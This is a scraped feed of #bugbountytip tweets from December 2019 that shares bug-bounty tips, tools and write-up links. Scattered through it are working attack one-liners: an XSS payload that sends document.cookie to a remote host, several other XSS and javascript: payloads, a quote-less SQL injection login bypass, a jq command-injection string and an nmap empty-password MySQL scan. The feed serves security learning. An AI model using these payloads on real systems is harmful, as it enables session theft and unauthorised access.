5 Clickjacking is an easy $100 - $500 vulnerability. Super easy to find and often forgotten by developers and hunters alike. Easy wins all day. More info on my blog: https://t.co/kcOYSJcbUG #BugBounty #bugbountytips #bugbountytip #infosec #appsec #osint #xss #redteam #dfir https://t.co/4zPbulEHqC
Andy Garcia
@GaelleTjat


2019-12-29 15:49:12
2 For sure horizontal moves require some form knowledge of the vertical ones. Referring to the Cors Lab 3 where you need to know/read XSS in order to solve the lab 🤦🏾‍♀️🤦🏾‍♀️🤦🏾‍♀️ #BugBounty #bugbountytip #BugBounty2020Goals
Vishnu Vardhan Gadupudi
@vishu10x00


2019-12-29 15:18:24
0 If you spend most of your time in low speed internet connection like me i.e > 100KB/sec just use Google cloud shell which is free or just use a cheap vps providers like digital ocean :) #bugbountytip https://t.co/CvazXZy8p1
bug bounty tips - Retweet
@BugbountytipsR


2019-12-29 03:45:01
0 "The more you talk, the more they REVEAL" TIP : Check The Server Response Carefully x 3 Tool TIPs: You can modify response by burp [FACEBOOK HACKED] by EVIL BOY AJAY @evilboyajay wRITEUp https://t.co/26eGroHHNu #bugbountytip #bugbountytips
🧠🏴‍☠️Borbolla
@renatoborbolla


2019-12-29 03:29:38
0 Best #firefox addons for #Hacking: -HackBar -Cookies Manager+ -User-Agent Switcher -Tamper Data -FoxyProxy Standard -Wappalyzer: -HttpRequester -RESTClient: -Tampermonkey -XSS Me -SQL Inject Me -iMacros -FirePHP #bugbountytips #bugbountytip #hacking #OSINT #Pentesting
Pentester /KökBüre
@GokBoruEfe


2019-12-28 23:40:34
1 Best #firefox addons for #Hacking: -HackBar -Cookies Manager+ -User-Agent Switcher -Tamper Data -FoxyProxy Standard -Wappalyzer: -HttpRequester -RESTClient: -Tampermonkey -XSS Me -SQL Inject Me -iMacros -FirePHP #bugbountytips #bugbountytip #hacking #OSINT #pentest
plenum 🇹🇳
@plenumlab


2019-12-28 20:52:16
0 There are only two kinds of infosec folks: - Those who say P.O.C - Those who say POC as POK There you have it now you know. #bugbountytips #bugbountytip
Antonio
@HerrJoost


2019-12-28 20:25:31
2 Best budget notebook focused on programming /#bugbounty? #bugbountytip
ghostlulz
@ghostlulz1337


2019-12-28 16:17:21
7 Cross-Origin Resource Sharing (CORS) can be used to bypass the Same Origin Policy(SOP) and read sensitive user data if implemented improperly. Easy wins all day. Learn more on my blog: https://t.co/ZdNpP9a3hy #BugBounty #bugbountytip #bugbountytips #infosec #appsec #osint #cors https://t.co/hR0qm2YeGc
გოჩა ოქრაძე (Gocha Okradze)
@GochaOqradze


2019-12-28 14:58:50
0 #bugbountytips #bugbountytip #Brutelogic #knoxss Thank @rodoassis for this test page. When you love xss and try do it in your phone browser: Android mozilla https://t.co/sRV8TzIgIP
ghostlulz
@ghostlulz1337


2019-12-28 13:31:41
30 If you're looking to make a living doing bug bounties or penetration testing you may want to get a copy of my book: https://t.co/zJFRZjg5q2 #bugbounty #xss #osint #redteam #bugbountytips #bugbountytip #infosec https://t.co/fVT4hqpfpi
Ashish Kunwar
@D0rkerDevil


2019-12-28 12:50:58
1 #bugbountytip do asn lookups and do nmap scan on cidr range[s]. and you might end up with juicy services like rpcbind , snmp etc or panels having default creds.
Nouroz Gaming
@NourozGaming


2019-12-28 10:01:10
1 Best #firefox addons for #Hacking: -HackBar -Cookies Manager+ -User-Agent Switcher -Tamper Data -FoxyProxy Standard -Wappalyzer: -HttpRequester -RESTClient: -Tampermonkey -XSS Me -SQL Inject Me -iMacros -FirePHP #bugbountytips #bugbountytip #hacking #OSINT #pentest
Ammar Amer
@cry__pto


2019-12-28 08:15:48
9 Best #firefox addons for #Hacking: -HackBar -Cookies Manager+ -User-Agent Switcher -Tamper Data -FoxyProxy Standard -Wappalyzer: -HttpRequester -RESTClient: -Tampermonkey -XSS Me -SQL Inject Me -iMacros -FirePHP #bugbountytips #bugbountytip #hacking #OSINT #pentest
Ammar Amer
@cry__pto


2019-12-28 07:58:17
17 Reverse Shell Cheat Sheet TooL: https://t.co/ROjGR5MCTl #bugbountytip #hacking #pentest https://t.co/00p6QbX7sO
Ammar Amer
@cry__pto


2019-12-28 07:53:24
7 JexBoss: Jboss (and Java Deserialization Vulnerabilities) verify and EXploitation Tool: https://t.co/EMKunAzMS5 #bugbountytip #hacking #pentest
m0z
@LooseSecurity


2019-12-28 00:51:41
0 A nice find by @s3c_krd which is definitely worth checking out: https://t.co/JRj3kv0zDI CRLF Injection is kinda rare to come by these days, but this was a cool PoC on Twitter. :) #bugbounty #bugbountytip #bugbountytips
Th3Alch3mist~
@Debian_Hunter


2019-12-27 17:06:41
2 Found this in a write-up and this is cool ....have a look XSSI:- https://t.co/s6baugCH6l JSONP:- https://t.co/BNkRFlwTnN #bugbountytips #bugbounty #bughunting #bugbountytip https://t.co/9SXzd4t9Kw
Tinu rockk
@TinuRock007


2019-12-27 15:41:10
0 finally secure @sony 2019 arrived as xmas gift :) #swag #bugbountytips #bugbountytip #cybersecurity #sony #hackerone #togetherwehitharder https://t.co/77H3eJ2uV9
Mashoud1122
@mashoud1122


2019-12-27 09:28:34
2 Did my 1st collab with @OriginalSicksec and @Skeletorkeys We got an amazing XSS on https://t.co/mVGZMsShQL WAF Bypass used: document.write(atob('PGltZyBzcmM9aHR0cDovL2xvY2FsaG9zdDo4MDkvcD89') + btoa(document.cookie) + '>') #bugbountytips #bugbountytip #BugBounty https://t.co/xkL6Dr47ed
D Ξ Ξ P Λ K ⚙️
@Deepak_maxx


2019-12-27 06:40:48
0 Hey @NahamSec just so you know people in India pronounce your name as "Ben shani-singhnapur" ! ๐Ÿ™ƒ #bugbounty #bughunter #bugbountytips #bugbountytip
cor3_cls
@cor3_cls


2019-12-26 20:01:06
3 @enigmaticsoulrg @zPrototype2 @gobias_infosec paid: @PentesterLab. Free: @hacker0x01 Hacker101 site and CTF. @Bugcrowd levelup and university <3 (youtube & git), and the best for me is @PortSwigger @WebSecAcademy Also #bugbountytip hashtag and @intigriti tips are very informative.
Karna
@karna__1


2019-12-26 17:56:24
0 To all those who want to know 'How do I get started with Bug Bounties?', go through the threads! #bugbounty #bugbountytips #infosec #bugbountytip #gettingstarted https://t.co/kgXdWqIHJ2
D Ξ Ξ P Λ K ⚙️
@Deepak_maxx


2019-12-26 13:09:29
5 Port scanning can be seen as, or construed as, a crime. We should never execute a port scanner against any website or IP address without explicit, written permission from the owner of the server or computer that you're targeting #infosecurity #infosec #cybersecurity #bugbountytip
Ajay Gautam
@evilboyajay


2019-12-26 10:29:34
2 Check out my new blog about Bypassing Brand Collabs Manager Eligibility. #bugbountytip #bugbounty #cybersecurity https://t.co/VpLI1UNVz6
Nassec.io
@nassecio


2019-12-26 10:26:23
3 @evilboyajay has a new write up for the bug bounty community. Check out our weekly blog about Brand Collabs Manager bypass on Facebook. #infosec #infosecmatters #hacking #bugbounty #bugbountytip https://t.co/4TDqHCMUso
Andy InfoSec
@AndyInfoSec_


2019-12-26 07:22:01
0 Part 3: Resources about #GraphQL #bugbounty Facebook GraphQL CSRF: https://t.co/7LnN4yo1Zp Tools : https://t.co/I52mNTERIN https://t.co/MHIuNuvaHC https://t.co/qlCtI5KJMI https://t.co/LPOkb9LtSj #cybersecurity #bugbountytip #bug #bounty #vapt #andyinfosec
Texy45
@RegisDeldicque


2019-12-26 06:06:42
0 @yeswehack @intigriti #bugbountytips #bugbountytip Tips : if your target forward http to https urls, try to add %0a char at the end of http urls. You could probably find out juicy paths.
Asad Anwar
@AsadAnw90


2019-12-25 23:25:13
0 Always look "view-source" page, sometime html page containing secret key. #bugbountytip #bugbounty https://t.co/VxzIgzVd06
Cryptographer
@crypt0gr4ph3r


2019-12-25 16:50:02
0 #bugbountytip When token says invalid on password change when unauthorisation. Try to use the same invalid token when authorisation. Low severity account takeover , awarded $200 bounty #hackerone #bugbounty #hacker101
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-25 07:22:52
0 OWASP Events Calendar - Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #pentesting #devsecops #cybersecurity #ceh #eccouncil #owasp #hackerone https://t.co/q2BFcxrK65
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-25 07:14:39
3 Windows Process Hacking Library Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #pentesting #devsecops #cybersecurity #ceh #FolloMe https://t.co/t6TtdwgfQm
Sayaan Alam
@ehsayaan


2019-12-25 06:01:11
0 Finally Done with LazyRecon Set-Up on Ubuntu VM , Thanks to @NahamSec For this great script.. #bugbountytip #bugbounty https://t.co/XLxtx3FAKS
warbid
@id_warb


2019-12-25 02:02:44
0 Why does everyone talk about PDO if it doesn't work? Yet another case IRL. #bugbountytip https://t.co/efz78UQSd6
bug bounty tips - Retweet
@BugbountytipsR


2019-12-24 16:22:32
0 WEB CACHE POSITIONING HOST HEADER INJECTION by James Kettle @albinowax #bugbountytip #bugbountytips #bugbounty https://t.co/Lau7339zXG
Jinone
@jinonehk


2019-12-24 07:47:07
1 New Write-up About a dom xss From a private project 500$ https://t.co/oa4JnqhtwB Merry Christmas to you all ! Thanks @Hacker0x01 #TogetherWeHitHarder #BugBounty #bugbountytip
Ammar Amer🇸🇾
@cry__pto


2019-12-24 07:40:18
3 Finding root accounts with an empty password in MySQL servers: nmap -p3306 --script mysql-empty-password xx.xx.xx.xx #Hacking #bugbountytip #Pentesting
Sayaan Alam
@ehsayaan


2019-12-24 02:32:45
0 Yay!!! Another 10k Awarded From TataCliq For Multiple Rate Limiting Issues!!! Great BB Program.. 2 More Triaged.. #bugbounty #bugbountytip #togetherwehitharder
Ricardo Freitas
@0x61737078


2019-12-24 02:11:26
0 RT @andripwn: RT @pwn0sec: Web cache poisoning attack https://t.co/6f6dxXBZTL #bugbounty #bugbountytip #bugbountytips #webcache_poisoning_attack
Ash
@m0rph1n3e


2019-12-23 23:15:55
0 is it possible to bypass the file extension in Local File Inclusion? URL Example: https://blahblahblah/?language=english which reads from english.html ( only html files ) #bugbounty #bugbountytip #bugbountytips #hacker0x01 #LFI
Security Executions Code
@pwn0sec


2019-12-23 20:58:18
0 File Path Traversal Using Burp-suite (Intruder) https://t.co/CmPakEgzfB #bugbountytip #bugbountytips #path_traversal #burpsuite #intruder
ghostlulz
@ghostlulz1337


2019-12-23 17:03:56
9 A Race Condition allowed one person to steal over $1,000,000 dollars from an ATM. If you're curious how to detect these type of flaws check out my blog: https://t.co/jycSCNE9ms #BugBounty #bugbountytip #bugbountytips #infosec #redteam #osint #xss #pentest #appsec #DFIR https://t.co/DxXsgzyZ0Z
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-23 11:05:40
2 Top #pentesting and Bug Bounty Burp Extensions https://t.co/naoLUFqmPu #hackdoor #bugbounty #bugbountytip #bugbountytips #hacker #penetrationtesting #pentesting #devops #devsecops
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-23 11:03:19
4 Hardware Hacker Bee #hackdoor #bugbounty #bugbountytip #bugbountytips #hacker #penetrationtesting #pentesting #devops #devsecops https://t.co/KHAvODLYHa
გოჩა ოქრაძე (Gocha Okradze)
@GochaOqradze


2019-12-22 21:40:06
1 #bugboutytips, #bugbountytip, #burp Detect file path traversal by Burp Suite intruder + regext https://t.co/T1xb4tCsLV via @YouTube
გოჩა ოქრაძე (Gocha Okradze)
@GochaOqradze


2019-12-22 21:37:21
2 #bugbountytip, #bugbountytips, #burp, #xss Easy way detect easy reflect XSS. Easy Reflect XSS Burp Intruder https://t.co/oYRVhwD1VA via @YouTube
Ammar Amer🇸🇾
@cry__pto


2019-12-22 16:49:04
0 Pentesting-Bible #hacking #pentest #redteam #OSINT #malware #CyberSecurity #ctf #bugbountytip it is just the beginning!😎 https://t.co/MmUnOQkJ7a
Andy Garcia
@GaelleTjat


2019-12-22 16:48:33
0 Great reading. #Infosec #Infosectips #bugbountytip https://t.co/NmloxT9KE3
Sunil
@Sunilkande1137


2019-12-22 14:33:19
0 Vimeo upload function SSRF by @dPhoeniixx https://t.co/DMIZfZoHJA #hacking #pentesting #bugbounty #recon #pentest #infosec #cybersecurity #itsecurity #websecurity #appsec #hacker #security #Hackers #Android #Androidhacking #bugbountytips #bugbountytip #hackerone #ssrf #hacking
ईशान सिंह
@R0X4R


2019-12-22 13:23:57
1 Filter bypass for xss in input tag. #bugbountytip #bugbounty #xss #hacking #happytosecure #bugbountycommunity #bugbountytips https://t.co/98c2ORAMwW
Karna
@karna__1


2019-12-22 13:08:46
0 Converted IP formats can be used to bypass blacklisted IP addresses while trying SSRFs. You just need to do 3 steps and you can convert formats at any time using your terminal. Happy Hunting! #bugbountytip #bugbountytips #infosec #AUTOMATION (2/2)
Ammar Amer🇸🇾
@cry__pto


2019-12-22 08:56:42
1 -1-2000 articles as pdf files & 2000 links to advanced articles and resources about different fields of ethical hacking and programing -2-114 detailed osint tips: -how to gather info & why -useful tools https://t.co/xGKKQoPyyq #bugbountytip #Hacking #OSINT #Pentesting #redteam
Brodie Codie โ„ข
@brodie_codie


2019-12-22 07:31:56
0 Not a bad week, submitted 5 Cross-site scripting (XSS) vulnerability Reports... now the waiting game begins <a onmouseover="alert(document.cookie)">xxs link</a> "><img src=x onerror=alert(domain)> #bugbountytips #bugbountytip
ईशान सिंह
@R0X4R


2019-12-22 04:58:41
1 Filter bypass for xss in input tag. #bugbountytip #bugbounty #xss #hacking #happytosecure #bugbountycommunity #bugbountytips https://t.co/9vrKqD7lnY
Hendrik
@hendrikvb


2019-12-21 21:00:28
0 Obviously whatweb (@urbanadventur3r) will provide interesting results too! #bugbountytip https://t.co/z1uuPGsmcZ
ghostlulz
@ghostlulz1337


2019-12-21 13:04:48
4 🎅 MERRY CHRISTMAS 🎅 If you're looking for a good read over the holiday you should check out my Bug Bounty Book. Instead of spending money you could be making money💰 https://t.co/zJFRZjg5q2 #BugBounty #bugbountytips #bugbountytip #osint #xss #appsec #dfir #redteam #hackers https://t.co/wWp4w7lmFM
drivertom
@drivertomtt


2019-12-21 12:13:30
0 How to defeat webshell scanners #bugbountytips #bugbountytip https://t.co/A79IMJYhtk
bug bounty tips - Retweet
@BugbountytipsR


2019-12-21 04:46:45
0 @iagox86 Tools - Padbuster Poracle Ciphers - CAST-cbc aes-128-cbc aes-192-cbc aes-256-cbc bf-cbc camellia-128-cbc camellia-192-cbc camellia-256-cbc cast-cbc cast5-cbc des-cbc des-ede-cbc des-ede3-cbc desx-cbc rc2-40-cbc rc2-64-cbc rc2-cbc seed-cbc #bugbountytip #bugbountytips 2/2
bug bounty tips - Retweet
@BugbountytipsR


2019-12-21 04:42:02
0 DECRYPT CIPHER WITHOUT THE KEY Padding Oracle Attack in Detail by Ron Bowes @iagox86 Explanation https://t.co/KWuU3SruSj An Example https://t.co/u0DcQnqa0o Encrypt data https://t.co/NnH2sXuoXT Practice https://t.co/xtgWVCO63p #Pastebin #bugbountytip #bugbountytips (1/2)
ghostlulz
@ghostlulz1337


2019-12-21 02:32:20
8 Wayback SQL Scanner - https://t.co/IcaV2mPjQV Swagger API - https://t.co/5toTZrRmdz New Robots.txt - https://t.co/IsyaPyECWG CSV Injection - https://t.co/loAf6mRXft XXE - https://t.co/vhpq7Bjg4d #BugBounty #bugbountytips #bugbountytip #infosec #osint #xss #appsec #hacking https://t.co/DGkhLNFata
Tarek Mohammed
@Conan0x3


2019-12-20 21:05:46
0 - Get a slack notification from "Monitorizer" about new sub-domains for a target - Found sub-domain for splunk enterprise - Search exploits for current version - Found CVE allow to disclose the server info along with product license key :D #bugbountytip #BugBounty https://t.co/fULk1BZbwP
Inon Shkedy
@InonShkedy


2019-12-20 01:50:06
2 Pentest for APIs? Leverage the predictable nature of REST APIs to find admin API endpoints! For example, if you saw the following API call: GET /api/v1/users/<id> Give it a chance, and change to DELETE / POST to create / delete users. #bugbountytip #bugbounty
Jesse Clark
@Hogarth45_ND


2019-12-19 23:12:22
1 On @Hacker0x01 use the Scope Version page to be ensured you are seeing the entire scope for program. Some times you can find several domains listed that are not reflected on the regular policy page. #bugbountytip https://t.co/9aHu40ON8I
Kenan
@h1_kenan


2019-12-19 21:59:09
0 It is time! https://t.co/oVgbVlEwQj #XSS #hacking #security #bugbountytip Please RT if you like. thanks
Yadhavi
@PrincessYadhavi


2019-12-19 18:44:19
2 "$HOME/bugbounty/paltform(ht,bugcrowd,etc)/program(verizonmedia)/target(yahoo)/target(com)(if scope has multiple TLDs)/date(dec-20)/tool(masscan)/filename (with toolname to easily identify)(yahoo.com-masscan.txt)" #bugbountytips #bugbounty #bugbountytip
Yadhavi
@PrincessYadhavi


2019-12-19 18:39:53
0 Use same directory structure on all of your systems.(windows, kali vm, vps). It'll save a lot of time. my directory structure for masscan on yahoo: "$HOME/bugbounty/h1/verzionmedia/yahoo/com/dec-20/masscan/yahoo.com-masscan.txt" #bugbountytips #bugbounty #bugbountytip
Apoorv Raj Saxena
@secxena


2019-12-19 16:02:04
1 I just published CredCheck — A credential Pentesting framework #bugbountytool #bugbounty #bugbountytip #Section144 https://t.co/zVlMCiIhpN
ak1t4 🇦🇷
@akita_zen


2019-12-19 15:52:43
1 #bugbountytip: The Program always has the last word, Not the Triaging Analyst. Keep pushing until program security team ping you with a "clear" feedback. *Most of triagers/analyst prioritizes customers than bugbounty hunters , even when your report is valid. #bugbounty #infosec
Sebastian Wieseler
@kickino


2019-12-19 14:13:45
0 Second subdomain takeover within a few days. 🥳🥳 The bugs are all around. They’re just waiting for you to find them #bugbounty #bugbountytip #togetherwehitharder
Sanketh Sharath
@sharathsanketh


2019-12-19 13:38:04
3 After 6 months of bug hunting, i have taken a step back to pause and go back to reading and training (labs) this month. On reading again, I realised I didn't know shit about shit. Learning never ends. I really recommend newbies do this! #bugbounty #bugbountytips #bugbountytip
bug bounty tips - Retweet
@BugbountytipsR


2019-12-19 11:56:28
0 Parameter Pollution #bugbountytips #bugbountytip #bugbounty https://t.co/UolTrcx2q8
Fisher
@Regala_


2019-12-19 09:13:28
0 Actually, here's my top tip for writing a good report: you should be able to follow and reproduce the steps on YOUR own report after some time has passed #bugbounty #bugbountytip
d0nut
@d0nutptr


2019-12-19 01:03:37
0 @John08369305 @uraniumhacker @intigriti You might say “then teach them!” Which I have more than most... but even the people I’ve spent hours on don’t seem to “get it”. Then they go around bringing others down with their misunderstandings. Just look at #bugbountytip . Like half of these are garbage.
mohsin khan
@mohsink83789226


2019-12-18 16:57:34
0 Please share web pentesting resources with me #bug #bugbountytips #bugbountytip #hacking #Hacker #bountyhunter #bounty
Rafin Rahman Chy
@rafinrahmanchy


2019-12-18 14:06:23
6 Required Skills for Facebook Bug Bounty *Web App Pentesting *Facebook API *graphQL *Burp Suite *Studying PoCs #BugBounty #bugbountytip #bugbountytips #EthicalHacker #EthicalHacking #Hacking #Hacker #Hackers #InfoSec #Infosecurity #ITsecurity #ITSec #netsec #appsec #websecurity https://t.co/AprGSWj64P
0x8hany
@Haniawad


2019-12-18 02:25:10
5 As @zseano always saying lazy developer reuse the code :) #BugBounty #bugbountytip https://t.co/NKfPRcd5f0
ghostlulz
@ghostlulz1337


2019-12-17 21:27:13
7 SQL injection is one of the most popular vulnerabilities out there yet there seems to be a lack of people who can identify this flaw in an application's source code. More info on my blog: https://t.co/m5K3yzo6iU #BugBounty #bugbountytip #bugbountytips #infosec #xss #sqli #osint https://t.co/BeKWOSmNpY
Fisher
@Regala_


2019-12-17 15:31:24
2 Flexing of the day 😇 (impact took a beating) If you need help/tips -> reply below with SPECIFIC questions other than where to start, how to get crit, etc #bugbountytip https://t.co/GGpecf900H
Dhamu
@Dhamu_offi


2019-12-17 10:44:05
1 #bugbountytip #bugbounty Abusing feature to steal your tokens https://t.co/jN2AvQDQ7i
Rafin Rahman Chy
@rafinrahmanchy


2019-12-17 10:20:33
2 Best guideline to become a Web Application Security Researcher in my opinion https://t.co/uVslvJiX80 #EthicalHacking #EthicalHacker #Hacking #Hacker #WebSecurity #BugBounty #bugbountytip #bugbountytips #netsec #AppSec #InfoSec #ITsecurity #CyberSecurity #Pentesting #pentest
Dhamu
@Dhamu_offi


2019-12-17 10:17:30
7 #bugbountytip #bugbounty Hacking GitHub with Unicode's dotless 'I'. #Vulnerability: Password reset emails delıvered to the wrong address. https://t.co/VKRlN2AxdH
Rafin Rahman Chy
@rafinrahmanchy


2019-12-17 09:33:35
5 Facebook Bug Bounty Resources by Philippe Harewood https://t.co/bpGdyUXc98 #Facebook #FB #BugBounty #bugbountytip #bugbountytips #EthicalHacking #EthicalHacker #Hacking #Hacker #Hackers #WhiteHat #WhiteHatHackers #AppSec #InfoSec #ITSecurity #CyberSecurity #Pentesting #Pentest https://t.co/hXoBqe1G5V
Avanish Pathak
@avanish46


2019-12-17 03:18:52
3 I earned $750 on @Bugcrowd . Capture the Account Creation Request On BurpSuite, Most of the case you'll find the redirect request in burp but not on the web : - [ https.//www.TARGET.com/account-created?redirectUrl=javascript:alert(document.cookie)// ] #bugbounty #bugbountytip https://t.co/Mxy2TieMIh
Ammar Amer🇸🇾
@cry__pto


2019-12-17 00:38:05
7 113 #OSINT TIPS created by me and the number of tips will get higher every day until it reach 1000 tips. New Updates. https://t.co/gNMSDGULS6 #Hacking #PenTest #bugbountytips #redteam #CyberSecurity #infosec #bugbountytip
Tirtha Mandal
@tirtha_mandal


2019-12-16 23:01:04
1 First time I successfully reproduced HTTP Dsync attack on a bug bounty program. Thank you @synack @SynackRedTeam 🤩 #synack #srt #redteam #bugbountytip #httpdsync https://t.co/zlPjFgXbHS
Ben Tai
@ben_tby


2019-12-16 21:07:28
4 Just a few days before I was simultaneously celebrating my first and second reward, and today I'm proudly celebrating my third reward. Thank you, @Hacker0x01 #BugBounty #bugbountytip #Hacking https://t.co/CcftdtdQya https://t.co/aADPguvhzk
bugbountytip
@a_l_e_r_t_1_


2019-12-16 18:05:36
0 https://t.co/pjFDcvvJCX i'm newbie on bug bounty. When i working i'm streaming on twitch. Please check my channel and follow me 😂. #bugbountytip #bugbounytips
Simpliv
@simplivllc


2019-12-16 16:00:07
1 This Self-paced Course Teaches You In Detail About [Ethical Hacking] Click Here To Sign Up #Hacking #Cybersecurity #bugbountytip #networking @StartGrowthHack @cry__pto @Pavandep8 @simplivllc https://t.co/6Q7g0olioK https://t.co/qEolSxBN7w
bug bounty tips - Retweet
@BugbountytipsR


2019-12-16 15:23:05
0 SQLi Without Quotes One of the BEST and SIMPLE BYPA$$ by @rodoassis username = \ password = INPUT2 SELECT * FROM login WHERE username = '{\' AND password = }'$INPUT2'; Part inside { } is considered as string https://t.co/mVDuuArf5Z #bugbountytips #bugbountytip
ghostlulz
@ghostlulz1337


2019-12-16 14:51:19
0 If you are serious about making a living doing bug bounties or working as a penetration tester you may want to get a copy of my latest book. 💰HUGE KNOWLEDGE DROP 💰 https://t.co/zJFRZjg5q2 #BugBounty #bugbountytip #bugbountytips #osint #infosec #redteam #hacking #pentest https://t.co/8tbkOCbFgM
Evgeny Larin
@godexmachine


2019-12-16 13:15:39
0 You can identify the Laravel framework by laravel_session cookie, then make a potential illegal request like POST, PUT, etc to check if debug mode is enabled. #BugBountyTip #BugBounty
TomNomNom
@TomNomNom


2019-12-16 11:00:27
9 If you need an element other than <a> for DOM Clobbering (i.e. one that returns an attribute value instead of '[Object HTMLElement]' when you call .toString() on it), you can use <area> with an href attribute #bugBountyTip https://t.co/YCSMhhPK61
noobSecurity
@noobsec_org


2019-12-16 07:17:12
6 https://t.co/7phSLNkWWL How we get $4000 in 5 minutes (Indonesian Language) #bugbounty #bugbountytip #bugbountytips #ittakesacrowd #togetherwehitharder
Laxmikant Bhumkar
@LuckyBhumkar


2019-12-16 00:09:51
0 Step by Step Bug Bounty by Nishant Saurav #bugbountytip https://t.co/0qTUn8I7Br
Elsadat ✪
@M0_SADAT


2019-12-15 00:38:20
3 I have submitted P1&P2 bugs more than 20 days and still no fix!! @santi_lopezz99 #bugbountytip PAY ME THEN DO THE DAMMN FIX! #bugbountylife #bugbounty #hacking #infosec
Max
@0xw2w


2019-12-14 23:01:10
2 @Hacker0x01 my.anotherdomain\@anotherdomain.com - 500 error my.anotherdomain^@anotherdomain.com - 302, accepted If you see that there are errors & your redirect not occurs but there are hints that this could work in particular cases, don't give up and continues fuzz! #bugbountytip #bugbounty
TheDelfX
@TheDelfX


2019-12-14 17:12:19
0 We are hackers. #hack #BugBounty #bugbountytip #software #hacking #hacker #hackerone https://t.co/29Q6mV643B
ghostlulz
@ghostlulz1337


2019-12-14 16:00:33
7 If you are serious about making a living doing bug bounties or working as a penetration tester you may want to get a copy of my latest book. 💰HUGE KNOWLEDGE DROP 💰 https://t.co/zJFRZjg5q2 #BugBounty #bugbountytip #bugbountytips #osint #infosec #redteam #hacking #pentest https://t.co/1TiV1v7Ipm
Nm Kannan 🇮🇳
@cybrsadist


2019-12-14 14:28:33
2 Useful video for n00b bug hunters => https://t.co/KbiKnOA4mg by @InsiderPhD #bugbountytip #bugbounty #infosec #penetrationtesting
bug bounty tips - Retweet
@BugbountytipsR


2019-12-14 14:09:20
0 Gr8 Blind SQLi tips BUGH/*$$$$*/UNTER - Insert comment b/w string, if respond remain same then it is sqli Profile @gerben_javado WriteuP https://t.co/65svYcig2u Wonder Why @gerben_javado is not writing more blogs? #bugbountytip #bugbountytips
Sudoka
@sudo_sudoka


2019-12-14 08:05:24
1 Tableau Server #unauthenticated XSS, CVE-2019-19719, just visit: http://example[.]com/en/embeddedAuthRedirect.html?auth=javascript:alert("XSS") It's also an Open Redirect. #ThreatIntel #infosec #bugbounty #bugbountytip Let's search on Shodan: https://t.co/c4zhLFo9KK
ᴂ
@pouyana1


2019-12-14 06:53:55
0 sometimes you can rely on 'Last-Modified' header to recognize software version, useful for finding available public exploits. #bugbountytips #bugbounty #bugbountytip
Shantanu Kulkarni
@shantanukul_


2019-12-14 06:35:01
7 6k hackerone disclosed reports at one place. https://t.co/3Dod4cwLHj #hacking #pentesting #bugbounty #recon #pentest #infosec #cybersecurity #itsecurity #websecurity #appsec #hacker #security #Hackers #Android #Androidhacking #bugbountytips #bugbountytip #hackerone #bugcrowd
ᴂ
@pouyana1


2019-12-13 18:17:29
1 Use x-forwarded-for to bypass WAF ip based limitations. #bugbountytip #bugbounty #bugbountytips
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-13 04:06:34
0 Cross Site Request Forgery: Techniques https://t.co/3N7hAtbbFP #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #ceh #eccouncil #certification #training #cybersecuritytraining
Selim Enes Karaduman
@Enesdex


2019-12-12 18:55:51
0 Always check for location.hash and location.href if these js codes are going into any sink without encoding it's Dom XSS E.g var hash = location.href .....innerHTML = hash #bugbountytip #bugbountytips #BugBounty
Pflash Punk
@PflashPunk


2019-12-12 18:48:25
0 I just published SSRF via FFmpeg HLS processing https://t.co/NISu4rr8Ik #bugbounty #bugbountytips #bugbountytip
Halil AHMAD
@Halilahmadd


2019-12-12 18:06:10
0 After a nice stored xss I prepared my report.I hope everything will be fine. #BugBounty #BugBountyTip #Hackerone @Hacker0x01 @GoogleVRP https://t.co/gEmljQEZd9
/๐’…๐’†๐’—/๐’๐’–๐’๐’ ๅฐ้ขจ
@spyerror


2019-12-12 17:47:49
0 @Aksam funny, i think you are sleeping 😴 #BugBounty #BugBountyTip #WAF #infosec https://t.co/kExJ2STUK2
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-12 17:17:17
0 When the screens went black: How NotPetya taught Maersk to rely on resilience – not luck – to mitigate future cyber-attacks https://t.co/ECnt63vXqE #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #ceh #eccouncil
YogoshaOfficial
@YogoshaOfficial


2019-12-12 14:15:14
3 [#bugbountytip] Found staging application that give you access to a privilege account with default credz, make sure to reuse this domain cookies to the main domain (prod), you can easily access as privileged user. @TnMch_ & Get ready for #yogoshachristmaschallenge next monday !
bug bounty tips - Retweet
@BugbountytipsR


2019-12-12 13:56:24
0 TIP: IF you DON'T like the RESPOND of SERVER INTERCEPT RESPOND CHANGE IT use BURP Changed Respond to Bypass Authentication by John Simon Profile https://t.co/m6mB5kZ7lh WriteuP https://t.co/K1SbMWjDfq #bugbountytip #bugbountytips #writeup #hacking
Zero Xyele
@zeroxyele


2019-12-12 11:59:11
0 I released new tool for extracting api keys and secrets. https://t.co/YqD2Cac6iy #bugbounty #bugbountytip #bugbountytips #hackerone #hacker101 #bugcrowd https://t.co/jzAuhGY7b8
Sunil
@Sunilkande1137


2019-12-12 06:16:33
1 Recon Resources https://t.co/W7NLDe4PNJ https://t.co/xj3JvFgojf https://t.co/Gx4sx1ZoPM https://t.co/gFAXmz3t34 #hacking #pentesting #bugbounty #recon #pentest #infosec #cybersecurity #ITsecurity #websecurity #appsec #hacker #security #Hackers #bugbountytips #bugbountytip
Mashoud1122
@mashoud1122


2019-12-12 04:17:01
1 Command exec in JQ cat file.json | jq .[;whoami;] returns error with command executed. #bugbountytip #bugbountytips #BugBounty #infosec #Security
Sunil
@Sunilkande1137


2019-12-12 01:25:04
